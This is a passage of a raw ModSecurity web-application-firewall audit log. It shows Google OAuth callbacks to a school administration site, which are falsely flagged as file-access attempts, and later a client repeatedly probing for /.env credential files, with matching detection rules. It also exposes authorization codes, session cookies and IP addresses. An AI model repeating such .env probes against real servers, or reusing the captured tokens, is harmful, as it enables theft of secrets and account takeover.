Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --68d48413-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHbPRukk8cgt8UnU9og_wAAAEc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753340733069686 419102 (- - -) Stopwatch2: 1753340733069686 419102; combined=4627, p1=667, p2=3579, p3=164, p4=77, p5=140, sr=247, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --68d48413-Z-- --8970c867-A-- [24/Jul/2025:10:06:38.069148 +0300] aIHbfUdutIOpb_kg22ijPwAAABU 212.28.242.186 38224 127.0.0.1 7081 --8970c867-B-- GET /administration/index.php?code=4/0AVMBsJi3zrz0zlQRa-kw7J85uRvlJ0pJPsCGO7mR3JxxvoMe1Q-XJDdh361ZJWjH2wMm4Q&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=1&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9,ar;q=0.8,fr;q=0.7 priority: u=0, i cookie: PHPSESSID=s8d4rbojk8t4hi6keo5rmg2934 --8970c867-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --8970c867-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHbfUdutIOpb_kg22ijPwAAABU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753340797579556 489773 (- - -) Stopwatch2: 1753340797579556 489773; combined=5554, p1=712, p2=4265, p3=340, p4=54, p5=182, sr=268, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8970c867-Z-- --4b4e4873-A-- [24/Jul/2025:10:06:51.585288 +0300] aIHbi0dutIOpb_kg22ijYAAAAAw 212.28.242.186 52552 127.0.0.1 7081 --4b4e4873-B-- GET /administration/index.php?code=4/0AVMBsJgKx8pu-fZD1BFFDaBxeVK8IP2Aigbz5p2TzxlCQahwB6grqtu9fF3lY9hewvKaEw&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=vcssc934i4vhgfu8vs74t6is75 --4b4e4873-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --4b4e4873-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHbi0dutIOpb_kg22ijYAAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753340811135859 449577 (- - -) Stopwatch2: 1753340811135859 449577; combined=4562, p1=593, p2=3611, p3=140, p4=52, p5=165, sr=146, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4b4e4873-Z-- --f9e8252a-A-- [24/Jul/2025:10:09:06.283736 +0300] aIHcERukk8cgt8UnU9oluwAAAEg 195.112.198.68 35392 127.0.0.1 7081 --f9e8252a-B-- GET /administration/index.php?code=4/0AVMBsJg1YnvrJ6ERhTMM8M2KRO1LlZAMH-GIzfJf4YXcHXOz-_SFovsNhn_e8_bKtxDsBQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: college.jinansystem.com X-Real-IP: 195.112.198.68 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=0ou2lq5tu0pesms1so97mkhtt1 --f9e8252a-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3649 Content-Type: text/html; charset=UTF-8 --f9e8252a-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||college.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||college.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "college.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHcERukk8cgt8UnU9oluwAAAEg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/college.jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753340945855946 427981 (- - -) Stopwatch2: 1753340945855946 427981; combined=6516, p1=751, p2=5438, p3=145, p4=54, p5=128, sr=194, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f9e8252a-Z-- --38c7d266-A-- [24/Jul/2025:10:20:29.081738 +0300] aIHevBukk8cgt8UnU9o3bQAAAEY 90.214.236.66 48156 127.0.0.1 7081 --38c7d266-B-- GET /administration/index.php?code=4/0AVMBsJjv0BNbdJkA4HtnvwIDcoOSgj-EermIY8vx1Sqy-r7rpu57JZH3bwSMn_3JJZ0Jbg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 90.214.236.66 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 accept-encoding: gzip, deflate, br user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15 accept-language: en-us referer: https://accounts.google.com/ cookie: PHPSESSID=l56ftredvmkg30u15jv119ben1 --38c7d266-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --38c7d266-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHevBukk8cgt8UnU9o3bQAAAEY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753341628588171 493813 (- - -) Stopwatch2: 1753341628588171 493813; combined=5301, p1=743, p2=4159, p3=179, p4=87, p5=133, sr=164, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --38c7d266-Z-- --fe2c2016-A-- [24/Jul/2025:10:25:37.411949 +0300] aIHf8Bukk8cgt8UnU9o_yAAAAEA 212.28.242.186 34678 127.0.0.1 7081 --fe2c2016-B-- GET /administration/index.php?code=4/0AVMBsJgckIRX4qYG-2C1LUxkR7yXtSba-dfCR8wXHMkjuC1EUhxMUESxF-tSO3c51O46nA&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Microsoft Edge";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=t61udbaa0pe42lb5cbaielo093 --fe2c2016-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --fe2c2016-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHf8Bukk8cgt8UnU9o_yAAAAEA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753341936981109 431022 (- - -) Stopwatch2: 1753341936981109 431022; combined=5588, p1=613, p2=4564, p3=123, p4=82, p5=206, sr=151, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fe2c2016-Z-- --b36f375a-A-- [24/Jul/2025:10:27:24.657448 +0300] aIHgXFooLYw4or2LgWI1MAAAANQ 185.241.208.91 44462 127.0.0.1 7081 --b36f375a-B-- GET /.env HTTP/1.0 Host: itilebanon.com X-Real-IP: 185.241.208.91 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --b36f375a-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 24 Jul 2014 11:29:50 GMT ETag: "3bf-4feeec6556780" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --b36f375a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "itilebanon.com"] [uri "/.env"] [unique_id "aIHgXFooLYw4or2LgWI1MAAAANQ"] Stopwatch: 1753342044652807 4728 (- - -) Stopwatch2: 1753342044652807 4728; combined=2649, p1=681, p2=1900, p3=0, p4=0, p5=68, sr=179, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b36f375a-Z-- --307c0243-A-- [24/Jul/2025:10:27:46.700195 +0300] aIHgchukk8cgt8UnU9pCJAAAAEU 185.241.208.91 54280 127.0.0.1 7081 --307c0243-B-- GET /.env HTTP/1.0 Host: itilebanon.com X-Real-IP: 185.241.208.91 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --307c0243-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 24 Jul 2014 11:29:50 GMT ETag: "3bf-4feeec6556780" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --307c0243-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "itilebanon.com"] [uri "/.env"] [unique_id "aIHgchukk8cgt8UnU9pCJAAAAEU"] Stopwatch: 1753342066695172 5154 (- - -) Stopwatch2: 1753342066695172 5154; combined=2911, p1=684, p2=2140, p3=0, p4=0, p5=87, sr=171, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --307c0243-Z-- --994ae33e-A-- [24/Jul/2025:10:28:20.750438 +0300] aIHglBukk8cgt8UnU9pC4gAAAEM 185.241.208.91 37042 127.0.0.1 7081 --994ae33e-B-- GET /itilebanon.com/.env HTTP/1.0 Host: itilebanon.com X-Real-IP: 185.241.208.91 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --994ae33e-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 24 Jul 2014 11:29:50 GMT ETag: "3bf-4feeec6556780" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --994ae33e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "itilebanon.com"] [uri "/itilebanon.com/.env"] [unique_id "aIHglBukk8cgt8UnU9pC4gAAAEM"] Stopwatch: 1753342100746246 4641 (- - -) Stopwatch2: 1753342100746246 4641; combined=2634, p1=523, p2=2034, p3=0, p4=0, p5=76, sr=126, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --994ae33e-Z-- --16ecbe57-A-- [24/Jul/2025:10:28:24.600580 +0300] aIHgmFooLYw4or2LgWI3vgAAANU 185.241.208.91 39384 127.0.0.1 7081 --16ecbe57-B-- GET /itilebanon.com/.env HTTP/1.0 Host: itilebanon.com X-Real-IP: 185.241.208.91 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --16ecbe57-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 24 Jul 2014 11:29:50 GMT ETag: "3bf-4feeec6556780" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --16ecbe57-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "itilebanon.com"] [uri "/itilebanon.com/.env"] [unique_id "aIHgmFooLYw4or2LgWI3vgAAANU"] Stopwatch: 1753342104596709 3957 (- - -) Stopwatch2: 1753342104596709 3957; combined=2277, p1=527, p2=1677, p3=0, p4=0, p5=72, sr=138, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --16ecbe57-Z-- --85c6f923-A-- [24/Jul/2025:10:28:28.490265 +0300] aIHgnFooLYw4or2LgWI37gAAAMM 185.241.208.91 40192 127.0.0.1 7081 --85c6f923-B-- GET /.env.www HTTP/1.0 Host: itilebanon.com X-Real-IP: 185.241.208.91 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --85c6f923-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 24 Jul 2014 11:29:50 GMT ETag: "3bf-4feeec6556780" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --85c6f923-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id 